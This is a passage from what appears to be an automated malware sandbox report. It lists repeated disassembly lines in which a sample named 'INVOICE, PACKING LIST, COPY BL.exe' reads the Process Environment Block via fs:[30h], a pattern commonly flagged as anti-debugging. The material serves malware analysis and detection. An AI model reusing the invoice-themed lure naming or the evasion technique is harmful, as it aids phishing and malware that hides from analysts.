                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01708324 mov eax, dword ptr fs:[00000030h]3_2_01708324
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01708324 mov ecx, dword ptr fs:[00000030h]3_2_01708324
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01708324 mov eax, dword ptr fs:[00000030h]3_2_01708324
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01708324 mov eax, dword ptr fs:[00000030h]3_2_01708324
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A30B mov eax, dword ptr fs:[00000030h]3_2_0166A30B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A30B mov eax, dword ptr fs:[00000030h]3_2_0166A30B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A30B mov eax, dword ptr fs:[00000030h]3_2_0166A30B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162C310 mov ecx, dword ptr fs:[00000030h]3_2_0162C310
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01650310 mov ecx, dword ptr fs:[00000030h]3_2_01650310
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016403E9 mov eax, dword ptr fs:[00000030h]3_2_016403E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016403E9 mov eax, dword ptr fs:[00000030h]3_2_016403E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016403E9 mov eax, dword ptr fs:[00000030h]3_2_016403E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016403E9 mov eax, dword ptr fs:[00000030h]3_2_016403E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016403E9 mov eax, dword ptr fs:[00000030h]3_2_016403E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016403E9 mov eax, dword ptr fs:[00000030h]3_2_016403E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016403E9 mov eax, dword ptr fs:[00000030h]3_2_016403E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016403E9 mov eax, dword ptr fs:[00000030h]3_2_016403E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E3F0 mov eax, dword ptr fs:[00000030h]3_2_0164E3F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E3F0 mov eax, dword ptr fs:[00000030h]3_2_0164E3F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E3F0 mov eax, dword ptr fs:[00000030h]3_2_0164E3F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016663FF mov eax, dword ptr fs:[00000030h]3_2_016663FF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EC3CD mov eax, dword ptr fs:[00000030h]3_2_016EC3CD
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016383C0 mov eax, dword ptr fs:[00000030h]3_2_016383C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016383C0 mov eax, dword ptr fs:[00000030h]3_2_016383C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016383C0 mov eax, dword ptr fs:[00000030h]3_2_016383C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016383C0 mov eax, dword ptr fs:[00000030h]3_2_016383C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B63C0 mov eax, dword ptr fs:[00000030h]3_2_016B63C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE3DB mov eax, dword ptr fs:[00000030h]3_2_016DE3DB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE3DB mov eax, dword ptr fs:[00000030h]3_2_016DE3DB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE3DB mov ecx, dword ptr fs:[00000030h]3_2_016DE3DB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE3DB mov eax, dword ptr fs:[00000030h]3_2_016DE3DB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D43D4 mov eax, dword ptr fs:[00000030h]3_2_016D43D4
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D43D4 mov eax, dword ptr fs:[00000030h]3_2_016D43D4
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E388 mov eax, dword ptr fs:[00000030h]3_2_0162E388
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E388 mov eax, dword ptr fs:[00000030h]3_2_0162E388
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E388 mov eax, dword ptr fs:[00000030h]3_2_0162E388
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165438F mov eax, dword ptr fs:[00000030h]3_2_0165438F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165438F mov eax, dword ptr fs:[00000030h]3_2_0165438F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628397 mov eax, dword ptr fs:[00000030h]3_2_01628397
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628397 mov eax, dword ptr fs:[00000030h]3_2_01628397
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628397 mov eax, dword ptr fs:[00000030h]3_2_01628397
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634260 mov eax, dword ptr fs:[00000030h]3_2_01634260
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634260 mov eax, dword ptr fs:[00000030h]3_2_01634260
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634260 mov eax, dword ptr fs:[00000030h]3_2_01634260
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162826B mov eax, dword ptr fs:[00000030h]3_2_0162826B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B8243 mov eax, dword ptr fs:[00000030h]3_2_016B8243
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B8243 mov ecx, dword ptr fs:[00000030h]3_2_016B8243
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0170625D mov eax, dword ptr fs:[00000030h]3_2_0170625D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162A250 mov eax, dword ptr fs:[00000030h]3_2_0162A250
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636259 mov eax, dword ptr fs:[00000030h]3_2_01636259
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EA250 mov eax, dword ptr fs:[00000030h]3_2_016EA250
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EA250 mov eax, dword ptr fs:[00000030h]3_2_016EA250
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162823B mov eax, dword ptr fs:[00000030h]3_2_0162823B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402E1 mov eax, dword ptr fs:[00000030h]3_2_016402E1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402E1 mov eax, dword ptr fs:[00000030h]3_2_016402E1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402E1 mov eax, dword ptr fs:[00000030h]3_2_016402E1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017062D6 mov eax, dword ptr fs:[00000030h]3_2_017062D6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402A0 mov eax, dword ptr fs:[00000030h]3_2_016402A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402A0 mov eax, dword ptr fs:[00000030h]3_2_016402A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov ecx, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E284 mov eax, dword ptr fs:[00000030h]3_2_0166E284
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E284 mov eax, dword ptr fs:[00000030h]3_2_0166E284
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B0283 mov eax, dword ptr fs:[00000030h]3_2_016B0283
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B0283 mov eax, dword ptr fs:[00000030h]3_2_016B0283
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B0283 mov eax, dword ptr fs:[00000030h]3_2_016B0283
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166656A mov eax, dword ptr fs:[00000030h]3_2_0166656A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166656A mov eax, dword ptr fs:[00000030h]3_2_0166656A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166656A mov eax, dword ptr fs:[00000030h]3_2_0166656A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638550 mov eax, dword ptr fs:[00000030h]3_2_01638550
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638550 mov eax, dword ptr fs:[00000030h]3_2_01638550
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C6500 mov eax, dword ptr fs:[00000030h]3_2_016C6500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016325E0 mov eax, dword ptr fs:[00000030h]3_2_016325E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C5ED mov eax, dword ptr fs:[00000030h]3_2_0166C5ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C5ED mov eax, dword ptr fs:[00000030h]3_2_0166C5ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E5CF mov eax, dword ptr fs:[00000030h]3_2_0166E5CF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E5CF mov eax, dword ptr fs:[00000030h]3_2_0166E5CF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016365D0 mov eax, dword ptr fs:[00000030h]3_2_016365D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A5D0 mov eax, dword ptr fs:[00000030h]3_2_0166A5D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A5D0 mov eax, dword ptr fs:[00000030h]3_2_0166A5D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B05A7 mov eax, dword ptr fs:[00000030h]3_2_016B05A7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B05A7 mov eax, dword ptr fs:[00000030h]3_2_016B05A7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B05A7 mov eax, dword ptr fs:[00000030h]3_2_016B05A7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016545B1 mov eax, dword ptr fs:[00000030h]3_2_016545B1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016545B1 mov eax, dword ptr fs:[00000030h]3_2_016545B1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01632582 mov eax, dword ptr fs:[00000030h]3_2_01632582
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01632582 mov ecx, dword ptr fs:[00000030h]3_2_01632582
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01664588 mov eax, dword ptr fs:[00000030h]3_2_01664588
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E59C mov eax, dword ptr fs:[00000030h]3_2_0166E59C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BC460 mov ecx, dword ptr fs:[00000030h]3_2_016BC460
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165A470 mov eax, dword ptr fs:[00000030h]3_2_0165A470
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165A470 mov eax, dword ptr fs:[00000030h]3_2_0165A470
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165A470 mov eax, dword ptr fs:[00000030h]3_2_0165A470
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EA456 mov eax, dword ptr fs:[00000030h]3_2_016EA456
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162645D mov eax, dword ptr fs:[00000030h]3_2_0162645D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165245A mov eax, dword ptr fs:[00000030h]3_2_0165245A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E420 mov eax, dword ptr fs:[00000030h]3_2_0162E420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E420 mov eax, dword ptr fs:[00000030h]3_2_0162E420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E420 mov eax, dword ptr fs:[00000030h]3_2_0162E420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162C427 mov eax, dword ptr fs:[00000030h]3_2_0162C427
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A430 mov eax, dword ptr fs:[00000030h]3_2_0166A430
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01668402 mov eax, dword ptr fs:[00000030h]3_2_01668402
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01668402 mov eax, dword ptr fs:[00000030h]3_2_01668402
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01668402 mov eax, dword ptr fs:[00000030h]3_2_01668402
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016304E5 mov ecx, dword ptr fs:[00000030h]3_2_016304E5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016364AB mov eax, dword ptr fs:[00000030h]3_2_016364AB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016644B0 mov ecx, dword ptr fs:[00000030h]3_2_016644B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BA4B0 mov eax, dword ptr fs:[00000030h]3_2_016BA4B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EA49A mov eax, dword ptr fs:[00000030h]3_2_016EA49A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638770 mov eax, dword ptr fs:[00000030h]3_2_01638770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
